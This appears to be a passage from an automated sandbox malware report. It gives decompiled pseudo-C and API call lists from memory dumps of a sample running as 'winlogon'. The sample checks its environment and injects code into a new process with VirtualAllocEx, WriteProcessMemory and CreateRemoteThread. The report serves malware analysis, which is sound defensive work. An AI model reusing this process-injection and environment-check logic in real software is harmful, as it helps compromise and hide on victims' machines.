    • FreeLibrary.KERNEL32(00000000,?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364), ref: 00D74D41
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 47%
    			E00D666C0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				signed int _v8;
    				char _v1032;
    				short _v2056;
    				signed int _t11;
    				void* _t15;
    				void* _t16;
    				long _t25;
    				signed int _t36;
    				void* _t37;
    				void* _t38;
    				void* _t41;
    
    				_t35 = __esi;
    				_t34 = __edi;
    				_t26 = __ebx;
    				_t11 =  *0xd88004; // 0x276b9783
    				_v8 = _t11 ^ _t36;
    				E00D6D520(__edi,  &_v1032, 0, 0x400);
    				_t38 = _t37 + 0xc;
    				_t15 = E00D65770(__ebx,  &_v1032, _t34, __esi); // executed
    				if(_t15 != 0) {
    					_t25 = GetFileAttributesA( &_v1032); // executed
    					_t41 = _t25 - 0xffffffff;
    					_t42 = _t41 == 0;
    					if(_t41 == 0) {
    						L2:
    						E00D6D520(_t34,  &_v2056, 0, 0x800);
    						_t38 = _t38 + 0xc;
    						GetModuleFileNameW(GetModuleHandleW(0),  &_v2056, 0x3ff);
    						E00D65DD0(_t26, 0x1388,  &_v2056, _t34, _t35);
    						ExitProcess(0); // executed
    					}
    				}
    				_t16 = E00D65C20(_t26, _t34, _t35, _t42); // executed
    				if(_t16 != 0) {
    					goto L2;
    				}
    				return E00D6ABE4(_v8 ^ _t36);
    			}

    APIs
      • Part of subcall function 00D65770: GetComputerNameA.KERNEL32(?,000000FF), ref: 00D657B4
    • GetFileAttributesA.KERNELBASE(?), ref: 00D666FF
    • GetModuleHandleW.KERNEL32(00000000,?,000003FF), ref: 00D66735
    • GetModuleFileNameW.KERNEL32(00000000), ref: 00D6673C
      • Part of subcall function 00D65DD0: GetModuleHandleW.KERNEL32(?,?,0000040F), ref: 00D65EB8
      • Part of subcall function 00D65DD0: GetModuleFileNameW.KERNEL32(00000000,?,?,0000040F), ref: 00D65EBF
      • Part of subcall function 00D65DD0: GetWindowsDirectoryW.KERNEL32(?,000007FF), ref: 00D65F13
      • Part of subcall function 00D65DD0: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00D65F91
      • Part of subcall function 00D65DD0: VirtualAllocEx.KERNEL32(?,00000000,00002000,00003000,00000004), ref: 00D65FB7
      • Part of subcall function 00D65DD0: WriteProcessMemory.KERNEL32(?,00000000,?,00000848,?), ref: 00D65FE8
      • Part of subcall function 00D65DD0: VirtualAllocEx.KERNEL32(?,00000000,00002000,00003000,00000004), ref: 00D66048
      • Part of subcall function 00D65DD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?), ref: 00D6606A
      • Part of subcall function 00D65DD0: VirtualProtectEx.KERNEL32(?,00000000,00002000,00000020,?), ref: 00D66081
      • Part of subcall function 00D65DD0: CreateRemoteThread.KERNEL32(?,00000000,00004000,00000000,00000000,00000000,?), ref: 00D660A7
      • Part of subcall function 00D65DD0: TerminateProcess.KERNEL32(?,00000000), ref: 00D660C3
      • Part of subcall function 00D65DD0: CloseHandle.KERNEL32(?), ref: 00D660CD
      • Part of subcall function 00D65C20: GetFileAttributesA.KERNELBASE(?), ref: 00D65C6D
      • Part of subcall function 00D65C20: GetFileAttributesA.KERNELBASE(?), ref: 00D65C92
    • ExitProcess.KERNEL32 ref: 00D66754
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 87%
    			E00D64220(CHAR* __ecx, CHAR** _a8, intOrPtr* _a12) {
    				struct _PROCESS_INFORMATION _v20;
    				struct _STARTUPINFOA _v88;
    				void* __edi;
    				int _t14;
    				intOrPtr* _t21;
    				CHAR* _t22;
    				int _t23;
    				CHAR** _t25;
    
    				_t22 = __ecx;
    				if(__ecx != 0) {
    					_t25 = _a8;
    					if(_t25 != 0) {
    						 *_t25 = 0;
    					}
    					asm("xorps xmm0, xmm0");
    					asm("movups [ebp-0x10], xmm0");
    					E00D6D520(_t22,  &(_v88.lpReserved), 0, 0x40);
    					_v88.dwFlags = _v88.dwFlags | 0x00000001;
    					_v88.cb = 0x44;
    					_t14 = CreateProcessA(_t22, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20); // executed
    					_t23 = _t14;
    					if(_t23 != 0 || _t25 == 0) {
    						_t21 = _a12;
    						if(_t21 != 0) {
    							 *_t21 = _v20.dwProcessId;
    						}
    						return _t23;
    					} else {
    						 *_t25 = GetLastError();
    						return _t23;
    					}
    				} else {
    					return 0;
    				}
    			}

    APIs
    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00D6427E
    • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00D6428E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 61%
    			E00D6A730(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
    				signed int _v8;
    				char _v520;
    				signed int _v524;
    				intOrPtr* _v528;
    				signed int _t29;
    				short _t36;
    				signed int _t41;
    				intOrPtr _t52;
    				signed int _t70;
    				signed int _t75;
    				signed int _t77;
    
    				_t55 = __ecx;
    				_t29 =  *0xd88004; // 0x276b9783
    				_v8 = _t29 ^ _t77;
    				_v528 = __ecx;
    				if(__ecx == 0) {
    					return E00D6ABE4(_v8 ^ _t77);
    				} else {
    					_push(__edi);
    					E00D6D520(__edi,  &_v520, 0, 0x200);
    					_t36 = 0x61;
    					_t70 = 0;
    					do {
    						 *((short*)(_t77 + _t70 * 2 - 0x204)) = _t36;
    						_t36 = _t36 + 1;
    						_t70 = _t70 + 1;
    					} while (_t36 <= 0x7a);
    					if(_t70 != 0) {
    						_push(0x2a);
    						_t52 = E00D702C9(_t55);
    						if(_t52 == 0) {
    							return E00D6ABE4(_v8 ^ _t77);
    						} else {
    							E00D6D520(_t70, _t52, 0, 0x2a);
    							Sleep(1); // executed
    							_t41 = 0;
    							_v524 = 0;
    							do {
    								_t9 = _t41 + 1; // 0x1
    								_t75 = _t9;
    								 *((short*)(_t52 + _v524 * 2)) =  *((intOrPtr*)(_t77 + GetTickCount() / _t75 % _t70 * 2 - 0x204));
    								Sleep(1); // executed
    								_t41 = _t75;
    								_v524 = _t41;
    							} while (_t41 < 5);
    							 *_v528 = _t52;
    							return E00D6ABE4(_v8 ^ _t77);
    						}
    					} else {
    						return E00D6ABE4(_v8 ^ _t77);
    					}
    				}
    			}

    APIs
    • Sleep.KERNELBASE(00000001,?,?,?,?,?,?,00000000), ref: 00D6A7B6
    • GetTickCount.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00D6A7C8
    • Sleep.KERNELBASE(00000001,?,?,?,?,?,?,00000000), ref: 00D6A7EA
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 88%
    			E00D65B80(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				signed int _v8;
    				char _v1032;
    				signed int _t8;
    				void* _t12;
    				long _t16;
    				void* _t20;
    				signed int _t30;
    
    				_t28 = __edi;
    				_t8 =  *0xd88004; // 0x276b9783
    				_v8 = _t8 ^ _t30;
    				E00D6D520(__edi,  &_v1032, 0, 0x400);
    				_t12 = E00D65970(__ebx,  &_v1032, _t28, __esi); // executed
    				if(_t12 == 0) {
    					L7:
    					return E00D6ABE4(_v8 ^ _t30);
    				} else {
    					_t16 = GetFileAttributesA( &_v1032); // executed
    					if(_t16 != 0xffffffff) {
    						L6:
    						return E00D6ABE4(_v8 ^ _t30);
    					} else {
    						_t20 = CreateFileA( &_v1032, 0xc0000000, 3, 0, 2, 0, 0); // executed
    						if(_t20 == 0 || _t20 == 0xcccccccc || _t20 == 0xffffffff) {
    							goto L7;
    						} else {
    							CloseHandle(_t20);
    							goto L6;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 00D65970: GetVersionExW.KERNEL32(00000114), ref: 00D659AF
      • Part of subcall function 00D65970: __Stoull.NTSTC_LIBCMT ref: 00D65A16
      • Part of subcall function 00D65970: __Stoull.NTSTC_LIBCMT ref: 00D65A5B
    • GetFileAttributesA.KERNELBASE(?), ref: 00D65BBF
    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000), ref: 00D65BE0
    • CloseHandle.KERNEL32(00000000), ref: 00D65BF7
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 96%
    			E00D76514(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
    				signed int _v8;
    				char _v264;
    				char _v520;
    				char _v776;
    				char _v1800;
    				char _v1814;
    				struct _cpinfo _v1820;
    				intOrPtr _v1824;
    				signed int _v1828;
    				signed int _t63;
    				void* _t67;
    				signed int _t68;
    				intOrPtr _t69;
    				void* _t72;
    				char _t73;
    				char _t74;
    				signed char _t75;
    				signed int _t76;
    				signed char _t86;
    				char _t87;
    				char _t90;
    				signed int _t93;
    				signed int _t94;
    				signed int _t95;
    				void* _t96;
    				char* _t97;
    				intOrPtr _t101;
    				signed int _t102;
    
    				_t95 = __edx;
    				_t63 =  *0xd88004; // 0x276b9783
    				_v8 = _t63 ^ _t102;
    				_t101 = _a4;
    				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
    					_t96 = _t101 + 0x119;
    					_t90 = 0;
    					_t67 = 0xffffff9f;
    					_t68 = _t67 - _t96;
    					__eflags = _t68;
    					_v1828 = _t68;
    					do {
    						_t97 = _t96 + _t90;
    						_t69 = _t68 + _t97;
    						_v1824 = _t69;
    						__eflags = _t69 + 0x20 - 0x19;
    						if(_t69 + 0x20 > 0x19) {
    							__eflags = _v1824 - 0x19;
    							if(_v1824 > 0x19) {
    								 *_t97 = 0;
    							} else {
    								_t72 = _t101 + _t90;
    								_t57 = _t72 + 0x19;
    								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
    								__eflags =  *_t57;
    								_t59 = _t90 - 0x20; // -32
    								_t73 = _t59;
    								goto L24;
    							}
    						} else {
    							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
    							_t54 = _t90 + 0x20; // 0x20
    							_t73 = _t54;
    							L24:
    							 *_t97 = _t73;
    						}
    						_t68 = _v1828;
    						_t96 = _t101 + 0x119;
    						_t90 = _t90 + 1;
    						__eflags = _t90 - 0x100;
    					} while (_t90 < 0x100);
    				} else {
    					_t74 = 0;
    					do {
    						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
    						_t74 = _t74 + 1;
    					} while (_t74 < 0x100);
    					_t75 = _v1814;
    					_t93 =  &_v1814;
    					_v264 = 0x20;
    					while(1) {
    						_t108 = _t75;
    						if(_t75 == 0) {
    							break;
    						}
    						_t95 =  *(_t93 + 1) & 0x000000ff;
    						_t76 = _t75 & 0x000000ff;
    						while(1) {
    							__eflags = _t76 - _t95;
    							if(_t76 > _t95) {
    								break;
    							}
    							__eflags = _t76 - 0x100;
    							if(_t76 < 0x100) {
    								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
    								_t76 = _t76 + 1;
    								__eflags = _t76;
    								continue;
    							}
    							break;
    						}
    						_t93 = _t93 + 2;
    						__eflags = _t93;
    						_t75 =  *_t93;
    					}
    					E00D7721A(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
    					E00D792B3(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0); // executed
    					E00D792B3(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
    					_t94 = 0;
    					do {
    						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
    						if((_t86 & 0x00000001) == 0) {
    							__eflags = _t86 & 0x00000002;
    							if((_t86 & 0x00000002) == 0) {
    								 *((char*)(_t101 + _t94 + 0x119)) = 0;
    							} else {
    								_t37 = _t101 + _t94 + 0x19;
    								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
    								__eflags =  *_t37;
    								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
    								goto L15;
    							}
    						} else {
    							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
    							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
    							L15:
    							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
    						}
    						_t94 = _t94 + 1;
    					} while (_t94 < 0x100);
    				}
    				return E00D6ABE4(_v8 ^ _t102);
    			}

    APIs
    • GetCPInfo.KERNEL32(?,?), ref: 00D76539
      • Part of subcall function 00D7721A: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D73AE8,?,00000000,?,00000001,?,?,00000001,00D73AE8,?), ref: 00D77267
      • Part of subcall function 00D7721A: __alloca_probe_16.NTDLLP ref: 00D7729F
      • Part of subcall function 00D7721A: MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D772F0
      • Part of subcall function 00D7721A: GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D719A1,?), ref: 00D77302
      • Part of subcall function 00D7721A: __freea.LIBCMT ref: 00D7730B
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 86%
    			E00D65770(void* __ebx, void* __ecx, void* __edi, void* __esi) {
    				signed int _v8;
    				char _v264;
    				char _v1283;
    				char _v1284;
    				char _v1288;
    				void* _v1292;
    				long _v1296;
    				signed int _t25;
    				int _t31;
    				void* _t33;
    				char _t36;
    				char _t37;
    				void _t40;
    				void _t41;
    				void* _t44;
    				intOrPtr _t45;
    				void _t48;
    				void _t49;
    				void* _t54;
    				void* _t55;
    				signed int _t61;
    				intOrPtr* _t66;
    				signed int _t71;
    				void* _t77;
    				signed int _t78;
    				void* _t79;
    				void* _t80;
    				signed int _t81;
    				void* _t82;
    				void* _t84;
    				void* _t96;
    				void* _t98;
    				signed int _t99;
    				void* _t100;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    				void* _t105;
    
    				_t82 = __edi;
    				_t25 =  *0xd88004; // 0x276b9783
    				_v8 = _t25 ^ _t99;
    				_t54 = __ecx;
    				E00D6D520(__edi,  &_v264, 0, 0x100);
    				_t101 = _t100 + 0xc;
    				_v1296 = 0xff;
    				_t31 = GetComputerNameA( &_v264,  &_v1296); // executed
    				if(_t31 != 0) {
    					_v1292 = 0;
    					_t33 = E00D65670(_t54,  &_v264, _v1296, _t82, __esi,  &_v1292);
    					_t102 = _t101 + 4;
    					if(_t33 == 0) {
    						goto L1;
    					} else {
    						_t36 = "c:\\"; // 0x5c3a63
    						_push(__esi);
    						_push(_t82);
    						_v1288 = _t36;
    						_t37 =  *0xd85454; // 0x0
    						_v1284 = _t37;
    						E00D6D520(_t82,  &_v1283, 0, 0x3fb);
    						_t77 = _v1292;
    						_t103 = _t102 + 0xc;
    						_t96 = _t77;
    						do {
    							_t40 =  *_t77;
    							_t77 = _t77 + 1;
    						} while (_t40 != 0);
    						_t78 = _t77 - _t96;
    						_t84 =  &_v1288 - 1;
    						do {
    							_t41 =  *(_t84 + 1);
    							_t84 = _t84 + 1;
    						} while (_t41 != 0);
    						_t61 = _t78 >> 2;
    						memcpy(_t84, _t96, _t61 << 2);
    						_t44 = memcpy(_t96 + _t61 + _t61, _t96, _t78 & 0x00000003);
    						_t105 = _t103 + 0x18;
    						if(_t44 != 0 && _t44 != 0xffffffff && _t44 != 0xcccccccc) {
    							E00D7009A(_t44);
    							_t105 = _t105 + 4;
    						}
    						_t66 =  &_v1288;
    						_t79 = _t66 + 1;
    						do {
    							_t45 =  *_t66;
    							_t66 = _t66 + 1;
    						} while (_t45 != 0);
    						if(_t66 - _t79 < 0x3ff) {
    							_t80 =  &_v1288;
    							_t98 = _t80;
    							do {
    								_t48 =  *_t80;
    								_t80 = _t80 + 1;
    							} while (_t48 != 0);
    							_t81 = _t80 - _t98;
    							_t55 = _t54 - 1;
    							asm("o16 nop [eax+eax]");
    							do {
    								_t49 =  *(_t55 + 1);
    								_t55 = _t55 + 1;
    							} while (_t49 != 0);
    							_t71 = _t81 >> 2;
    							memcpy(_t55, _t98, _t71 << 2);
    							memcpy(_t98 + _t71 + _t71, _t98, _t81 & 0x00000003);
    						}
    						return E00D6ABE4(_v8 ^ _t99);
    					}
    				} else {
    					L1:
    					return E00D6ABE4(_v8 ^ _t99);
    				}
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,000000FF), ref: 00D657B4
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 30%
    			E00D74FB1(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
    				signed int _v8;
    				signed int _t18;
    				intOrPtr* _t20;
    				intOrPtr* _t31;
    				signed int _t33;
    
    				_t26 = __ecx;
    				_push(__ecx);
    				_t18 =  *0xd88004; // 0x276b9783
    				_v8 = _t18 ^ _t33;
    				_push(__esi);
    				_t20 = E00D74C37(0x16, "LCMapStringEx", 0xd80b9c, "LCMapStringEx"); // executed
    				_t31 = _t20;
    				if(_t31 == 0) {
    					LCMapStringW(E00D75039(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
    				} else {
    					 *0xd7f278(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
    					 *_t31();
    				}
    				return E00D6ABE4(_v8 ^ _t33);
    			}

    APIs
      • Part of subcall function 00D74C37: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364,?,00D7202C,00000000), ref: 00D74C97
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,27E85006,00000001,?,?), ref: 00D75022
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 16%
    			E00D74D9C(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
    				signed int _v8;
    				signed int _t4;
    				intOrPtr* _t6;
    				intOrPtr* _t16;
    				signed int _t18;
    
    				_push(__ecx);
    				_t4 =  *0xd88004; // 0x276b9783
    				_v8 = _t4 ^ _t18;
    				_t6 = E00D74C37(3, "FlsAlloc", 0xd80b34, 0xd80b3c); // executed
    				_t16 = _t6;
    				if(_t16 == 0) {
    					TlsAlloc();
    				} else {
    					 *0xd7f278(_a4);
    					 *_t16();
    				}
    				return E00D6ABE4(_v8 ^ _t18);
    			}

    APIs
      • Part of subcall function 00D74C37: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364,?,00D7202C,00000000), ref: 00D74C97
    • TlsAlloc.KERNEL32 ref: 00D74DDB
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    C-Code - Quality: 68%
    			E00D6E0F2(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
    				intOrPtr* _t6;
    				intOrPtr* _t10;
    
    				_t6 = E00D6DEE6(8, "InitializeCriticalSectionEx", 0xd7f6b4, "InitializeCriticalSectionEx"); // executed
    				_t10 = _t6;
    				if(_t10 == 0) {
    					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
    				}
    				L00D6B643();
    				return  *_t10(_a4, _a8, _a12);
    			}

    APIs
      • Part of subcall function 00D6DEE6: GetProcAddress.KERNEL32(00000000,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx,00000000,?,00D6DE74,00D90F50,00000FA0), ref: 00D6DF4A
    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,?), ref: 00D6E12F
    C-Code - Quality: 93%
    			E00D733B0(void* __ebx, void* __edi, void* __esi, signed int _a4, void* _a8, signed int _a12) {
    				signed int _v8;
    				long _v12;
    				struct _OVERLAPPED* _v16;
    				long _v20;
    				char _v24;
    				signed int _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				signed int _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				void* _v52;
    				signed int _t62;
    				intOrPtr _t66;
    				signed char _t68;
    				signed int _t69;
    				signed int _t71;
    				signed int _t73;
    				signed int _t74;
    				signed int _t77;
    				intOrPtr _t79;
    				signed int _t87;
    				signed int _t90;
    				signed int _t106;
    				signed int _t107;
    				signed int _t110;
    				intOrPtr _t112;
    				signed int _t117;
    				signed int _t119;
    				void* _t121;
    				signed int _t124;
    				signed int _t126;
    				signed int _t128;
    				void* _t129;
    
    				_t62 =  *0xd88004; // 0x276b9783
    				_v8 = _t62 ^ _t128;
    				_t110 = _a12;
    				_v12 = _t110;
    				_t124 = _a4;
    				_t121 = _a8;
    				_v52 = _t121;
    				if(_t110 != 0) {
    					__eflags = _t121;
    					if(_t121 != 0) {
    						_push(__ebx);
    						_t106 = _t124 >> 6;
    						_t119 = (_t124 & 0x0000003f) * 0x30;
    						_v32 = _t106;
    						_t66 =  *((intOrPtr*)(0xd91260 + _t106 * 4));
    						_v48 = _t66;
    						_v28 = _t119;
    						_t107 =  *((intOrPtr*)(_t66 + _t119 + 0x29));
    						__eflags = _t107 - 2;
    						if(_t107 == 2) {
    							L6:
    							_t68 =  !_t110;
    							__eflags = _t68 & 0x00000001;
    							if((_t68 & 0x00000001) != 0) {
    								_t66 = _v48;
    								L9:
    								__eflags =  *(_t66 + _t119 + 0x28) & 0x00000020;
    								if(__eflags != 0) {
    									E00D75316(_t124, 0, 0, 2);
    									_t129 = _t129 + 0x10;
    								}
    								_t69 = E00D72F55(_t107, _t119, __eflags, _t124);
    								__eflags = _t69;
    								if(_t69 == 0) {
    									_t112 =  *((intOrPtr*)(0xd91260 + _v32 * 4));
    									_t71 = _v28;
    									__eflags =  *(_t112 + _t71 + 0x28) & 0x00000080;
    									if(( *(_t112 + _t71 + 0x28) & 0x00000080) == 0) {
    										_v24 = 0;
    										_v20 = 0;
    										_v16 = 0;
    										_t73 = WriteFile( *(_t112 + _t71 + 0x18), _t121, _v12,  &_v20, 0); // executed
    										__eflags = _t73;
    										if(_t73 == 0) {
    											_v24 = GetLastError();
    										}
    										goto L28;
    									}
    									_t87 = _t107;
    									__eflags = _t87;
    									if(_t87 == 0) {
    										E00D72FCB(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
    										goto L17;
    									}
    									_t90 = _t87 - 1;
    									__eflags = _t90;
    									if(_t90 == 0) {
    										_t89 = E00D73198(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
    										goto L17;
    									}
    									__eflags = _t90 != 1;
    									if(_t90 != 1) {
    										goto L34;
    									}
    									_t89 = E00D730AA(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
    									goto L17;
    								} else {
    									__eflags = _t107;
    									if(_t107 == 0) {
    										_t89 = E00D72D35(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
    										L17:
    										L15:
    										L28:
    										asm("movsd");
    										asm("movsd");
    										asm("movsd");
    										_t74 = _v40;
    										__eflags = _t74;
    										if(_t74 != 0) {
    											__eflags = _t74 - _v36;
    											L40:
    											L41:
    											return E00D6ABE4(_v8 ^ _t128);
    										}
    										_t77 = _v44;
    										__eflags = _t77;
    										if(_t77 == 0) {
    											_t121 = _v52;
    											L34:
    											_t117 = _v28;
    											_t79 =  *((intOrPtr*)(0xd91260 + _v32 * 4));
    											__eflags =  *(_t79 + _t117 + 0x28) & 0x00000040;
    											if(( *(_t79 + _t117 + 0x28) & 0x00000040) == 0) {
    												L37:
    												 *((intOrPtr*)(E00D72122())) = 0x1c;
    												_t81 = E00D7210F();
    												 *_t81 =  *_t81 & 0x00000000;
    												__eflags =  *_t81;
    												L38:
    												goto L40;
    											}
    											__eflags =  *_t121 - 0x1a;
    											if( *_t121 != 0x1a) {
    												goto L37;
    											}
    											goto L40;
    										}
    										_t126 = 5;
    										__eflags = _t77 - _t126;
    										if(_t77 != _t126) {
    											_t81 = E00D720EC(_t77);
    										} else {
    											 *((intOrPtr*)(E00D72122())) = 9;
    											 *(E00D7210F()) = _t126;
    										}
